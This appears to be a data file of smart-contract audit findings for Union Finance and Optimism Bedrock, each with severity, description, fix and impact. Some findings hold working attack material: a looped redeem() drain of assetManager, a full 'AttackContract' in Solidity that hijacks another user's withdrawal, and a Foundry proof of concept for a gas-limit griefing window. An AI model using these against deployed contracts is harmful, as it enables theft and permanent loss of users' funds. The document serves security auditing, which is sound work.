What happens is that in the function `_calculateRewardsByBlocks` the if statement is triggered because the user's effectiveStaked == 0. As a result the internal function will return 0 and the cache `uint256 amount` will equal zero.\\n```\\nuint256 amount = _calculateRewardsByBlocks(account, token, pastBlocks, userInfo, globalTotalStaked, user);\\n```\\n\\n```\\nif (user.effectiveStaked == 0 || totalStaked == 0 || startInflationIndex == 0 || pastBlocks == 0) {\\n return 0;\\n }\\n```\\n\\nSince the cache `uint256 amount` have a zero value, the if statement in the function `withdrawRewards` will actually be ignored because of `&& amount > 0`. And the else statement will be triggered, which will override Kiki's accrued balance with ""amount"", which is actually zero.\\n```\\nif (unionToken.balanceOf(address(this)) >= amount && amount > 0) {\\n unionToken.safeTransfer(account, amount);\\n users[account][token].accrued = 0;\\n emit LogWithdrawRewards(account, amount);\\n\\n return amount;\\n } else {\\n users[account][token].accrued = amount;\\n emit LogWithdrawRewards(account, 0);\\n\\n return 0;\\n }\\n```\\n\\nBelow you can see the functions which are invoked starting from the function _getUserInfo:\\n```\\n(UserManagerAccountState memory user, Info memory userInfo, uint256 pastBlocks) = _getUserInfo(\\n userManager,\\n account,\\n token,\\n 0\\n );\\n```\\n\\n```\\nfunction _getUserInfo(\\n IUserManager userManager,\\n address account,\\n address token,\\n uint256 futureBlocks\\n ) internal returns (UserManagerAccountState memory user, Info memory userInfo, uint256 pastBlocks) {\\n userInfo = users[account][token];\\n uint256 lastUpdatedBlock = userInfo.updatedBlock;\\n if (block.number < lastUpdatedBlock) {\\n lastUpdatedBlock = block.number;\\n }\\n\\n pastBlocks = block.number - lastUpdatedBlock + futureBlocks;\\n\\n (user.effectiveStaked, user.effectiveLocked, user.isMember) = userManager.onWithdrawRewards(\\n account,\\n pastBlocks\\n );\\n 
}\\n```\\n\\n```\\nfunction onWithdrawRewards(address staker, uint256 pastBlocks)\\n external\\n returns (\\n uint256 effectiveStaked,\\n uint256 effectiveLocked,\\n bool isMember\\n )\\n {\\n if (address(comptroller) != msg.sender) revert AuthFailed();\\n uint256 memberTotalFrozen = 0;\\n (effectiveStaked, effectiveLocked, memberTotalFrozen) = _getEffectiveAmounts(staker, pastBlocks);\\n stakers[staker].stakedCoinAge = 0;\\n stakers[staker].lastUpdated = uint64(block.number);\\n stakers[staker].lockedCoinAge = 0;\\n frozenCoinAge[staker] = 0;\\n getLastWithdrawRewards[staker] = block.number;\\n\\n uint256 memberFrozenBefore = memberFrozen[staker];\\n if (memberFrozenBefore != memberTotalFrozen) {\\n memberFrozen[staker] = memberTotalFrozen;\\n totalFrozen = totalFrozen - memberFrozenBefore + memberTotalFrozen;\\n }\\n\\n isMember = stakers[staker].isMember;\\n }\\n```\\n\\n```\\nfunction _getEffectiveAmounts(address stakerAddress, uint256 pastBlocks)\\n private\\n view\\n returns (\\n uint256,\\n uint256,\\n uint256\\n )\\n {\\n uint256 memberTotalFrozen = 0;\\n CoinAge memory coinAge = _getCoinAge(stakerAddress);\\n\\n uint256 overdueBlocks = uToken.overdueBlocks();\\n uint256 voucheesLength = vouchees[stakerAddress].length;\\n // Loop through all of the stakers vouchees sum their total\\n // locked balance and sum their total currDefaultFrozenCoinAge\\n for (uint256 i = 0; i < voucheesLength; i++) {\\n // Get the vouchee record and look up the borrowers voucher record\\n // to get the locked amount and lastUpdated block number\\n Vouchee memory vouchee = vouchees[stakerAddress][i];\\n Vouch memory vouch = vouchers[vouchee.borrower][vouchee.voucherIndex];\\n\\n uint256 lastRepay = uToken.getLastRepay(vouchee.borrower);\\n uint256 repayDiff = block.number - _max(lastRepay, coinAge.lastWithdrawRewards);\\n uint256 locked = uint256(vouch.locked);\\n\\n if (overdueBlocks < repayDiff && (coinAge.lastWithdrawRewards != 0 || lastRepay != 0)) {\\n memberTotalFrozen += 
locked;\\n if (pastBlocks >= repayDiff) {\\n coinAge.frozenCoinAge += (locked * repayDiff);\\n } else {\\n coinAge.frozenCoinAge += (locked * pastBlocks);\\n }\\n }\\n\\n uint256 lastUpdateBlock = _max(coinAge.lastWithdrawRewards, uint256(vouch.lastUpdated));\\n coinAge.lockedCoinAge += (block.number - lastUpdateBlock) * locked;\\n }\\n\\n return (\\n // staker's total effective staked = (staked coinage - frozen coinage) / (# of blocks since last reward claiming)\\n coinAge.diff == 0 ? 0 : (coinAge.stakedCoinAge - coinAge.frozenCoinAge) / coinAge.diff,\\n // effective locked amount = (locked coinage - frozen coinage) / (# of blocks since last reward claiming)\\n coinAge.diff == 0 ? 0 : (coinAge.lockedCoinAge - coinAge.frozenCoinAge) / coinAge.diff,\\n memberTotalFrozen\\n );\\n }\\n```\\n\\n```\\nfunction _getCoinAge(address stakerAddress) private view returns (CoinAge memory) {\\n Staker memory staker = stakers[stakerAddress];\\n\\n uint256 lastWithdrawRewards = getLastWithdrawRewards[stakerAddress];\\n uint256 diff = block.number - _max(lastWithdrawRewards, uint256(staker.lastUpdated));\\n\\n CoinAge memory coinAge = CoinAge({\\n lastWithdrawRewards: lastWithdrawRewards,\\n diff: diff,\\n stakedCoinAge: staker.stakedCoinAge + diff * uint256(staker.stakedAmount),\\n lockedCoinAge: staker.lockedCoinAge,\\n frozenCoinAge: frozenCoinAge[stakerAddress]\\n });\\n\\n return coinAge;\\n }\\n```\\n\\nBelow you can see the function _calculateRewardsByBlocks:\\n```\\nfunction _calculateRewardsByBlocks(\\n address account,\\n address token,\\n uint256 pastBlocks,\\n Info memory userInfo,\\n uint256 totalStaked,\\n UserManagerAccountState memory user\\n ) internal view returns (uint256) {\\n uint256 startInflationIndex = users[account][token].inflationIndex;\\n\\n if (user.effectiveStaked == 0 || totalStaked == 0 || startInflationIndex == 0 || pastBlocks == 0) {\\n return 0;\\n }\\n\\n uint256 rewardMultiplier = _getRewardsMultiplier(user);\\n\\n uint256 curInflationIndex = 
_getInflationIndexNew(totalStaked, pastBlocks);\\n\\n if (curInflationIndex < startInflationIndex) revert InflationIndexTooSmall();\\n\\n return\\n userInfo.accrued +\\n (curInflationIndex - startInflationIndex).wadMul(user.effectiveStaked).wadMul(rewardMultiplier);\\n }\\n```\\n","```\\ncontracts/user/UserManager.sol\\n\\n function unstake(uint96 amount) external whenNotPaused nonReentrant {\\n Staker storage staker = stakers[msg.sender];\\n // Stakers can only unstaked stake balance that is unlocked. Stake balance\\n // becomes locked when it is used to underwrite a borrow.\\n if (staker.stakedAmount - staker.locked < amount) revert InsufficientBalance();\\n comptroller.withdrawRewards(msg.sender, stakingToken);\\n uint256 remaining = IAssetManager(assetManager).withdraw(stakingToken, msg.sender, amount);\\n if (uint96(remaining) > amount) {\\n revert AssetManagerWithdrawFailed();\\n }\\n uint96 actualAmount = amount - uint96(remaining);\\n _updateStakedCoinAge(msg.sender, staker);\\n staker.stakedAmount -= actualAmount;\\n totalStaked -= actualAmount;\\n emit LogUnstake(msg.sender, actualAmount);\\n }\\n```\\n" +Attackers can call UToken.redeem() and drain the funds in assetManager,medium,"Attackers can call `UToken.redeem()` and drain the funds in assetManager, taking advantage of the following vulnerability: due to round error, it is possible that uTokenAmount = 0; the redeem()function does not check whether `uTokenAmount = 0` and will redeem the amount of `underlyingAmount` even when zero uTokens are burned.\\nConsider the following attack scenario:\\nSuppose `exchangeRate = 1000 WAD`, that is each utoken exchanges for 1000 underlying tokens.\\nAttacker B calls `redeem(0, 999)`, then the else-part of the following code will get executed:\\n```\\n if (amountIn > 0) {\\n // We calculate the exchange rate and the amount of underlying to be redeemed:\\n // uTokenAmount = amountIn\\n // underlyingAmount = amountIn x exchangeRateCurrent\\n uTokenAmount = 
amountIn;\\n underlyingAmount = (amountIn * exchangeRate) / WAD;\\n } else {\\n // We get the current exchange rate and calculate the amount to be redeemed:\\n // uTokenAmount = amountOut / exchangeRate\\n // underlyingAmount = amountOut\\n uTokenAmount = (amountOut * WAD) / exchangeRate;\\n underlyingAmount = amountOut;\\n }\\n```\\n\\nwe have `uTokenAmount = 999*WAD/1000WAD = 0`, and `underlyingAmount = 999`.\\nSince `redeeem()` does not check whether `uTokenAmount = 0` and the function will proceed. When finished, the attacker will get 999 underlying tokens, but burned no utokens. He stole 999 underlying tokens.\\nThe attacker can accomplish draining the `assetManger` by writing a malicious contract/function using a loop to run `redeem(0, exchangeRate/WAD-1)` multiple times (as long as not running of gas) and will be able to steal more funds in one SINGLE transaction. Running this transaction a few times will drain `assetManager` easily. This attack will be successful when `exchangeRate/WAD-1 > 0`. Here we need to consider that `exchangeRate` might change due to the decreasing of `totalReeemable`. 
So in each iteration, when we call `redeem(0, exchangeRate/WAD-1)`, the second argument is recalculated.",Issue Attackers can call UToken.redeem() and drain the funds in assetManager\\nRevise `redeem()` so that it will revert when `uTokenAmount = 0`.,An attacker can keep calling redeem() and drain the funds in `assetManager`.,```\\n if (amountIn > 0) {\\n // We calculate the exchange rate and the amount of underlying to be redeemed:\\n // uTokenAmount = amountIn\\n // underlyingAmount = amountIn x exchangeRateCurrent\\n uTokenAmount = amountIn;\\n underlyingAmount = (amountIn * exchangeRate) / WAD;\\n } else {\\n // We get the current exchange rate and calculate the amount to be redeemed:\\n // uTokenAmount = amountOut / exchangeRate\\n // underlyingAmount = amountOut\\n uTokenAmount = (amountOut * WAD) / exchangeRate;\\n underlyingAmount = amountOut;\\n }\\n```\\n +"Malicious user can finalize other's withdrawal with less than specified gas limit, leading to loss of funds",high,"Transactions to execute a withdrawal from the Optimism Portal can be sent with 5122 less gas than specified by the user, because the check is performed a few operations prior to the call. Because there are no replays on this contract, the result is that a separate malicious user can call `finalizeWithdrawalTransaction()` with a precise amount of gas, cause the withdrawer's withdrawal to fail, and permanently lock their funds.\\nWithdrawals can be initiated directly from the `L2ToL1MessagePasser` contract on L2. These withdrawals can be withdrawn directly from the `OptimismPortal` on L1. This path is intended to be used only by users who know what they are doing, presumably to save the gas of going through the additional more “user-friendly” contracts.\\nOne of the quirks of the `OptimismPortal` is that there is no replaying of transactions. If a transaction fails, it will simply fail, and all ETH associated with it will remain in the `OptimismPortal` contract. 
Users have been warned of this and understand the risks, so Optimism takes no responsibility for user error.\\nHowever, there is an issue in the implementation of `OptimismPortal` that a withdrawal transaction can be executed with 5122 gas less than the user specified. In many cases, this could cause their transaction to revert, without any user error involved. Optimism is aware of the importance of this property being correct when they write in the comments:\\nWe want to maintain the property that the amount of gas supplied to the call to the target contract is at least the gas limit specified by the user. We can do this by enforcing that, at this point in time, we still have gaslimit + buffer gas available.\\nThis property is not maintained because of the gap between the check and the execution.\\nThe check is as follows, where FINALIZE_GAS_BUFFER == 20_000:\\n```\\nrequire(\\n gasleft() >= _tx.gasLimit + FINALIZE_GAS_BUFFER,\\n ""OptimismPortal: insufficient gas to finalize withdrawal""\\n);\\n```\\n\\nAfter this check, we know that the current execution context has at least 20,000 more gas than the gas limit. 
However, we then proceed to spend gas by (a) assigning the `l2Sender` storage variable, which uses 2900 gas because it's assigning from a non-zero value, and (b) perform some additional operations to prepare the contract for the external call.\\nThe result is that, by the time the call is sent with `gasleft()` - FINALIZE_GAS_BUFFER gas, `gasleft()` is 5122 lower than it was in the initial check.\\nMathematically, this can be expressed as:\\n`gasAtCheck >= gasLimit + 20000`\\n`gasSent == gasAtCall - 20000`\\n`gasAtCall == gasAtCheck - 5122`\\nRearranging, we get `gasSent >= gasLimit + 20000 - 5122 - 20000`, which simplifies to `gasSent >= gasLimit - 5122`.","Instead of using one value for `FINALIZE_GAS_BUFFER`, two separate values should be used that account for the gas used between the check and the call.","For any withdrawal where a user sets their gas limit within 5122 of the actual gas their execution requires, a malicious user can call `finalizeWithdrawalTransaction()` on their behalf with enough gas to pass the check, but not enough for execution to succeed.\\nThe result is that the withdrawing user will have their funds permanently locked in the `OptimismPortal` contract.\\nProof of Concept\\nTo test this behavior in a sandboxed environment, you can copy the following proof of concept.\\nHere are three simple contracts that replicate the behavior of the Portal, as well as an external contract that uses a predefined amount of gas.\\n```\\n// SPDX-License-Identifier: UNLICENSED\\npragma solidity ^0.8.13;\\n\\nlibrary SafeCall {\\n /**\\n * @notice Perform a low level call without copying any returndata\\n *\\n * @param _target Address to call\\n * @param _gas Amount of gas to pass to the call\\n * @param _value Amount of value to pass to the call\\n * @param _calldata Calldata to pass to the call\\n */\\n function call(\\n address _target,\\n uint256 _gas,\\n uint256 _value,\\n bytes memory _calldata\\n ) internal returns (bool) {\\n bool _success;\\n assembly 
{\\n _success := call(\\n _gas, // gas\\n _target, // recipient\\n _value, // ether value\\n add(_calldata, 0x20), // inloc\\n mload(_calldata), // inlen\\n 0, // outloc\\n 0 // outlen\\n )\\n }\\n return _success;\\n }\\n}\\n\\ncontract GasUser {\\n uint[] public s;\\n\\n function store(uint i) public {\\n for (uint j = 0; j < i; j++) {\\n s.push(1);\\n }\\n }\\n}\\n\\ncontract Portal {\\n address l2Sender;\\n\\n struct Transaction {\\n uint gasLimit;\\n address sender;\\n address target;\\n uint value;\\n bytes data;\\n }\\n\\n constructor(address _l2Sender) {\\n l2Sender = _l2Sender;\\n }\\n\\n function execute(Transaction memory _tx) public {\\n require(\\n gasleft() >= _tx.gasLimit + 20000,\\n ""OptimismPortal: insufficient gas to finalize withdrawal""\\n );\\n\\n // Set the l2Sender so contracts know who triggered this withdrawal on L2.\\n l2Sender = _tx.sender;\\n\\n // Trigger the call to the target contract. We use SafeCall because we don't\\n // care about the returndata and we don't want target contracts to be able to force this\\n // call to run out of gas via a returndata bomb.\\n bool success = SafeCall.call(\\n _tx.target,\\n gasleft() - 20000,\\n _tx.value,\\n _tx.data\\n );\\n }\\n}\\n```\\n\\nHere is a Foundry test that calls the Portal with various gas values to expose this vulnerability:\\n```\\n// SPDX-License-Identifier: UNLICENSED\\npragma solidity ^0.8.13;\\n\\nimport ""forge-std/Test.sol"";\\nimport ""../src/Portal.sol"";\\n\\ncontract PortalGasTest is Test {\\n Portal public c;\\n GasUser public gu;\\n\\n function setUp() public {\\n c = new Portal(0x000000000000000000000000000000000000dEaD);\\n gu = new GasUser();\\n }\\n\\n function testGasLimitForGU() public {\\n gu.store{gas: 44_602}(1);\\n assert(gu.s(0) == 1);\\n }\\n\\n function _executePortalWithGivenGas(uint gas) public {\\n c.execute{gas: gas}(Portal.Transaction({\\n gasLimit: 44_602,\\n sender: address(69),\\n target: address(gu),\\n value: 0,\\n data: 
abi.encodeWithSignature(""store(uint256)"", 1)\\n }));\\n }\\n\\n function testPortalCatchesGasTooSmall() public {\\n vm.expectRevert(bytes(""OptimismPortal: insufficient gas to finalize withdrawal""));\\n _executePortalWithGivenGas(65681);\\n }\\n\\n function testPortalSucceedsWithEnoughGas() public {\\n _executePortalWithGivenGas(70803);\\n assert(gu.s(0) == 1);\\n }\\n\\n function testPortalBugWithInBetweenGasLow() public {\\n _executePortalWithGivenGas(65682);\\n \\n // It now reverts because the array has a length of 0.\\n vm.expectRevert();\\n gu.s(0);\\n }\\n\\n function testPortalBugWithInBetweenGasHigh() public {\\n _executePortalWithGivenGas(70802);\\n \\n // It now reverts because the array has a length of 0.\\n vm.expectRevert();\\n gu.s(0);\\n }\\n}\\n```\\n\\nSummarizing the results of this test:\\nWe verify that the call to the target contract succeeds with 44,602 gas, and set that as gasLimit for all tests.\\nWhen we send 65,681 or less gas, it's little enough to be caught by the require statement.\\nWhen we send 70,803 or more gas, the transaction will succeed.\\nWhen we send any amount of gas between these two values, the require check is passed but the transaction fails.","```\\nrequire(\\n gasleft() >= _tx.gasLimit + FINALIZE_GAS_BUFFER,\\n ""OptimismPortal: insufficient gas to finalize withdrawal""\\n);\\n```\\n" +Causing users lose their fund during finalizing withdrawal transaction,high,"A malicious user can make users lose their fund during finalizing their withdrawal. 
This is possible due to presence of reentrancy guard on the function `relayMessage`.\\nBob (a malicious user) creates a contract (called AttackContract) on L1.\\n```\\n// SPDX-License-Identifier: MIT\\npragma solidity 0.8.0;\\n\\nstruct WithdrawalTransaction {\\n uint256 nonce;\\n address sender;\\n address target;\\n uint256 value;\\n uint256 gasLimit;\\n bytes data;\\n}\\n\\ninterface IOptimismPortal {\\n function finalizeWithdrawalTransaction(WithdrawalTransaction memory _tx)\\n external;\\n}\\n\\ncontract AttackContract {\\n bool public donotRevert;\\n bytes metaData;\\n address optimismPortalAddress;\\n\\n constructor(address _optimismPortal) {\\n optimismPortalAddress = _optimismPortal;\\n }\\n\\n function enableRevert() public {\\n donotRevert = true;\\n }\\n\\n function setMetaData(WithdrawalTransaction memory _tx) public {\\n metaData = abi.encodeWithSelector(\\n IOptimismPortal.finalizeWithdrawalTransaction.selector,\\n _tx\\n );\\n }\\n\\n function attack() public {\\n if (!donotRevert) {\\n revert();\\n } else {\\n optimismPortalAddress.call(metaData);\\n }\\n }\\n}\\n```\\n\\n```\\n if (!donotRevert) {\\n revert();\\n }\\n```\\n\\nThen, Bob calls the function `enableRevert` to set `donotRevert` to `true`. So that if later the function `attack()` is called again, it will not revert.\\n```\\n function enableRevert() public {\\n donotRevert = true;\\n }\\n```\\n\\nThen, Bob notices that Alice is withdrawing large amount of fund from L2 to L1. 
Her withdrawal transaction is proved but she is waiting for the challenge period to be finished to finalize it.\\nThen, Bob calls the function `setMetaData` on the contract `AttackContract` with the following parameter:\\n`_tx` = Alice's withdrawal transaction\\nBy doing so, the `metaData` will be equal to `finalizeWithdrawalTransaction.selector` + Alice's withdrawal transaction.\\n```\\n function setMetaData(WithdrawalTransaction memory _tx) public {\\n metaData = abi.encodeWithSelector(\\n IOptimismPortal.finalizeWithdrawalTransaction.selector,\\n _tx\\n );\\n }\\n```\\n\\nNow, after the challenge period is passed, and before the function `finalizeWithdrawalTransaction` is called by anyone (Alice), Bob calls the function `relayMessage` with the required data to retry his previous failed message again.\\nThis time, since `donotRevert` is `true`, the call to function `attack()` will not revert, instead the body of `else clause` will be executed.\\n```\\n else {\\n optimismPortalAddress.call(metaData);\\n }\\n```\\n\\nIn summary the attack is as follows:\\nBob creates a malicious contract on L1 called `AttackContract`.\\nBob sends a message from L2 to L1 to call the function `AttackContract.attack` on L1.\\nOn L1 side, after the challenge period is passed, the function `AttackContract.attack` will be called.\\nMessage relay on L1 will be unsuccessful, because the function `AttackContract.attack` reverts. 
So, Bob's message will be flagged as failed message.\\nBob sets `AttackContract.donotRevert` to true.\\nBob waits for an innocent user to request withdrawal transaction.\\nBob waits for the innocent user's withdrawal transaction to be proved.\\nBob sets meta data in his malicious contract based on the innocent user's withdrawal transaction.\\nBob waits for the challenge period to be passed.\\nAfter the challenge period is elapsed, Bob retries to relay his failed message again.\\n`CrossDomainMessenger.relayMessage` will call the `AttackContract.attack`, then it calls `OptimismPortal.finalizeWithdrawalTransaction` to finalize innocent user's withdrawal transaction. Then, it calls `CrossDomainMessenger.relayMessage`, but it will be unsuccessful because of reentrancy guard.\\nAfter finalizing the innocent user's withdrawal transaction, Bob's message will be flagged as successful.\\nSo, innocent user's withdrawal transaction is flagged as finalized, while it is not.","```\\n try IL1CrossDomainMessanger.relayMessage(// rest of code) {} catch Error(string memory reason) {\\n if (\\n keccak256(abi.encodePacked(reason)) ==\\n keccak256(abi.encodePacked(""ReentrancyGuard: reentrant call""))\\n ) {\\n revert(""finalizing should be reverted"");\\n }\\n }\\n```\\n","By doing this attack it is possible to prevent users from withdrawing their fund. 
Moreover, they lose their fund because withdrawal is flagged as finalized, but the withdrawal sent to `L1CrossDomainMessanger` was not successful.","```\\n// SPDX-License-Identifier: MIT\\npragma solidity 0.8.0;\\n\\nstruct WithdrawalTransaction {\\n uint256 nonce;\\n address sender;\\n address target;\\n uint256 value;\\n uint256 gasLimit;\\n bytes data;\\n}\\n\\ninterface IOptimismPortal {\\n function finalizeWithdrawalTransaction(WithdrawalTransaction memory _tx)\\n external;\\n}\\n\\ncontract AttackContract {\\n bool public donotRevert;\\n bytes metaData;\\n address optimismPortalAddress;\\n\\n constructor(address _optimismPortal) {\\n optimismPortalAddress = _optimismPortal;\\n }\\n\\n function enableRevert() public {\\n donotRevert = true;\\n }\\n\\n function setMetaData(WithdrawalTransaction memory _tx) public {\\n metaData = abi.encodeWithSelector(\\n IOptimismPortal.finalizeWithdrawalTransaction.selector,\\n _tx\\n );\\n }\\n\\n function attack() public {\\n if (!donotRevert) {\\n revert();\\n } else {\\n optimismPortalAddress.call(metaData);\\n }\\n }\\n}\\n```\\n" +Censorship resistance is undermined and bridging of assets can be DOSed at low cost,medium,"All L1->L2 transactions go through OptimismPortal's `depositTransaction` function. It is wrapped through the `metered` modifier. The goal is to create a gas market for L1->L2 transactions and not allow L1 TXs to fill up L2 batches (as the gas for deposit TX in L2 is payed for by the system), but the mechanism used makes it too inexpensive for a malicious user to DOS and censor deposits.\\nIt is possible for a malicious actor to snipe arbitrary L1->L2 transactions in the mempool for far too cheaply. 
This introduces two impacts:\\nUndermines censorship resistance guarantees by Optimism\\nGriefs users who simply want to bridge assets to L2\\nThe core issue is the check in ResourceMetering.sol:\\n```\\n// Make sure we can actually buy the resource amount requested by the user.\\nparams.prevBoughtGas += _amount;\\nrequire(\\n int256(uint256(params.prevBoughtGas)) <= MAX_RESOURCE_LIMIT,\\n ""ResourceMetering: cannot buy more gas than available gas limit""\\n);\\n```\\n\\nNote that `params.prevBoughtGas` is reset per block. This means attacker can view a TX in the mempool and wrap up the following flashbot bundle:\\nAttacker TX to `depositTransaction`, with gasLimit = 8M (MAX_RESOURCE_LIMIT)\\nVictim TX to `depositTransaction`\\nThe result is that attacker's transaction will execute and victim's TX would revert. It is unknown how this affects the UI and whether victim would be able to resubmit this TX again easily, but regardless it's clearly griefing user's attempt to bridge an asset. Note that a reverted TX is different from an uncompleted TX from a UX point of view.\\nFrom a censorship resistance perspective, there is nothing inherently preventing attack to continually use this technique to block out all TXs, albert gas metering price will rise as will be discussed.\\nNow we can demonstrate the cost of the attack to be low. Gas burned by the modifier is calculated as:\\n```\\n// Determine the amount of ETH to be paid.\\nuint256 resourceCost = _amount * params.prevBaseFee;\\n// rest of code\\nuint256 gasCost = resourceCost / Math.max(block.basefee, 1000000000);\\n```\\n\\n`params.prevBaseFee` is initialized at 1e9 and goes up per block by a factor of 1.375 when gas market is drained, while going down by 0.875 when gas market wasn't used at all.\\nIf we take the initial value, `resourceCost = 8e6 * 1e9 = 8e15`. If we assume tip is negligible to `block.basefee`, L1 gas cost in ETH equals `resourceCost` (divide by basefee and multiply by basefee). 
Therefore, cost of this snipe TX is:\\n`8e15 / 1e18 (ETH decimals) * 1600 (curr ETH price) = $12.80`\\nThe result is an extremely low price to pay, and even taking into account extra tips for frontrunning, is easily achievable.\\nIn practice `prevBaseFee` will represent the market price for L2 gas. If it goes lower than initial value, DOSing will become cheaper, while if it goes higher it will become more expensive. The key problem is that the attacker's cost is too similar to the victim's cost. If victim is trying to pass a 400k TX, attacker needs to buy a 7.6M of gas. This gap is too small and the resulting situation is that for DOS to be too expensive for attacker, TX would have to be far too expensive for the average user.","It is admittedly difficult to balance the need for censorship resistance with the prevention of L2 flooding via L1 TXs. However, the current solution which will make a victim's TX revert at hacker's will is inadequate and will lead to severe UX issues for users.",Censorship resistance is undermined and bridging of assets can be DOSed at low cost.,"```\\n// Make sure we can actually buy the resource amount requested by the user.\\nparams.prevBoughtGas += _amount;\\nrequire(\\n int256(uint256(params.prevBoughtGas)) <= MAX_RESOURCE_LIMIT,\\n ""ResourceMetering: cannot buy more gas than available gas limit""\\n);\\n```\\n" +[High] Function MigrateWithdrawal() may set gas limit so high for old withdrawals when migrating them by mistake and they can't be relayed in the L1 and users funds would be lost,medium,"Function `MigrateWithdrawal()` in migrate.go will turn a LegacyWithdrawal into a bedrock style Withdrawal. it should set a min gas limit value for the withdrawals. 
to calculate a gas limit contract overestimates it and if the value goes higher than L1 maximum gas in the block then the withdraw can't be relayed in the L1 and users funds would be lost while the withdraw could be possible before the migration it won't be possible after it.\\nThis is `MigrateWithdrawal()` code:\\n```\\n// MigrateWithdrawal will turn a LegacyWithdrawal into a bedrock\\n// style Withdrawal.\\nfunc MigrateWithdrawal(withdrawal *LegacyWithdrawal, l1CrossDomainMessenger *common.Address) (*Withdrawal, error) {\\n // Attempt to parse the value\\n value, err := withdrawal.Value()\\n if err != nil {\\n return nil, fmt.Errorf(""cannot migrate withdrawal: %w"", err)\\n }\\n\\n abi, err := bindings.L1CrossDomainMessengerMetaData.GetAbi()\\n if err != nil {\\n return nil, err\\n }\\n\\n // Migrated withdrawals are specified as version 0. Both the\\n // L2ToL1MessagePasser and the CrossDomainMessenger use the same\\n // versioning scheme. Both should be set to version 0\\n versionedNonce := EncodeVersionedNonce(withdrawal.Nonce, new(big.Int))\\n // Encode the call to `relayMessage` on the `CrossDomainMessenger`.\\n // The minGasLimit can safely be 0 here.\\n data, err := abi.Pack(\\n ""relayMessage"",\\n versionedNonce,\\n withdrawal.Sender,\\n withdrawal.Target,\\n value,\\n new(big.Int),\\n withdrawal.Data,\\n )\\n if err != nil {\\n return nil, fmt.Errorf(""cannot abi encode relayMessage: %w"", err)\\n }\\n\\n // Set the outer gas limit. 
This cannot be zero\\n gasLimit := uint64(len(data)*16 + 200_000)\\n\\n w := NewWithdrawal(\\n versionedNonce,\\n &predeploys.L2CrossDomainMessengerAddr,\\n l1CrossDomainMessenger,\\n value,\\n new(big.Int).SetUint64(gasLimit),\\n data,\\n )\\n return w, nil\\n}\\n```\\n\\nAs you can see it sets the gas limit as `gasLimit := uint64(len(data)*16 + 200_000)` and contract set 16 gas per data byte but in Ethereum when data byte is 0 then the overhead intrinsic gas is 4 and contract overestimate the gas limit by setting 16 gas for each data. this can cause messages with big data(which calculated gas is higher than 30M) to not be relay able in the L1 because if transaction gas set lower than calculated gas then OptimisimPortal would reject it and if gas set higher than calculated gas then miners would reject the transaction. while if code correctly estimated the required gas the gas limit could be lower by the factor of 4. for example a message with about 2M zeros would get gas limit higher than 30M and it won't be withdrawable in the L1 while the real gas limit is 8M which is relayable.","calculate gas estimation correctly, 4 for 0 bytes and 16 for none zero bytes.",some withdraw messages from L2 to L1 that could be relayed before the migration can't be relayed after the migration because of the wrong gas estimation.,"```\\n// MigrateWithdrawal will turn a LegacyWithdrawal into a bedrock\\n// style Withdrawal.\\nfunc MigrateWithdrawal(withdrawal *LegacyWithdrawal, l1CrossDomainMessenger *common.Address) (*Withdrawal, error) {\\n // Attempt to parse the value\\n value, err := withdrawal.Value()\\n if err != nil {\\n return nil, fmt.Errorf(""cannot migrate withdrawal: %w"", err)\\n }\\n\\n abi, err := bindings.L1CrossDomainMessengerMetaData.GetAbi()\\n if err != nil {\\n return nil, err\\n }\\n\\n // Migrated withdrawals are specified as version 0. Both the\\n // L2ToL1MessagePasser and the CrossDomainMessenger use the same\\n // versioning scheme. 
Both should be set to version 0\\n versionedNonce := EncodeVersionedNonce(withdrawal.Nonce, new(big.Int))\\n // Encode the call to `relayMessage` on the `CrossDomainMessenger`.\\n // The minGasLimit can safely be 0 here.\\n data, err := abi.Pack(\\n ""relayMessage"",\\n versionedNonce,\\n withdrawal.Sender,\\n withdrawal.Target,\\n value,\\n new(big.Int),\\n withdrawal.Data,\\n )\\n if err != nil {\\n return nil, fmt.Errorf(""cannot abi encode relayMessage: %w"", err)\\n }\\n\\n // Set the outer gas limit. This cannot be zero\\n gasLimit := uint64(len(data)*16 + 200_000)\\n\\n w := NewWithdrawal(\\n versionedNonce,\\n &predeploys.L2CrossDomainMessengerAddr,\\n l1CrossDomainMessenger,\\n value,\\n new(big.Int).SetUint64(gasLimit),\\n data,\\n )\\n return w, nil\\n}\\n```\\n" +Migration can be bricked by sending a message directly to the LegacyMessagePasser,medium,"The migration process halts and returns an error if any of the withdrawal data breaks from the specified format. However, the data for this migration comes from every call that has been made to the LegacyMessagePasser (0x00) address, and it is possible to send a transaction that would violate the requirements. The result is that the migration process would be bricked and need to be rebuilt, with some difficult technical challenges that we'll outline below.\\nWithdrawal data is saved in l2geth whenever a call is made to the LegacyMessagePasser address:\\n```\\nif addr == dump.MessagePasserAddress {\\n statedumper.WriteMessage(caller.Address(), input)\\n}\\n```\\n\\nThis will save all the calls that came via the L2CrossDomainMessenger. The expected format for the data is encoded in the L2CrossDomainMessenger. 
It encodes the calldata to be executed on the L1 side as: `abi.encodeWithSignature(""relayMessage(...)"", target, sender, message, nonce)`\\nThe migration process expects the calldata to follow this format, and expects the call to come from L2CrossDomainMessenger, implemented with the following two checks:\\n```\\nselector := crypto.Keccak256([]byte(""relayMessage(address,address,bytes,uint256)""))[0:4]\\nif !bytes.Equal(data[0:4], selector) {\\n return fmt.Errorf(""invalid selector: 0x%x"", data[0:4])\\n}\\n\\nmsgSender := data[len(data)-len(predeploys.L2CrossDomainMessengerAddr):]\\nif !bytes.Equal(msgSender, predeploys.L2CrossDomainMessengerAddr.Bytes()) {\\n return errors.New(""invalid msg.sender"")\\n}\\n```\\n\\nThe migration process will be exited and the migration will fail if this assumption is violated.\\nHowever, since the function on the LegacyMessagePasser is public, it can also be called directly with arbitrary calldata:\\n```\\nfunction passMessageToL1(bytes memory _message) external {\\n sentMessages[keccak256(abi.encodePacked(_message, msg.sender))] = true;\\n}\\n```\\n\\nThis allows us to submit calldata that would violate both of these checks and cause the migration to panic and fail.\\nWhile it may seem easy to filter these withdrawals out and rerun the migration, this solution would not work either. That's because, later in the process, we check that easy storage slot in the LegacyMessagePasser contract has a corresponding withdrawal in the migration:\\n```\\nfor slot := range slotsAct {\\n _, ok := slotsInp[slot]\\n if !ok {\\n return nil, fmt.Errorf(""unknown storage slot in state: %s"", slot)\\n }\\n}\\n```\\n\\nThe result is that the Optimism team would need to unwind the migration, develop a new migration process to account for this issue, and remigrate with an untested system.","Rather than throwing an error if withdrawal data doesn't meet the requirements, save a list of these withdrawals and continue. 
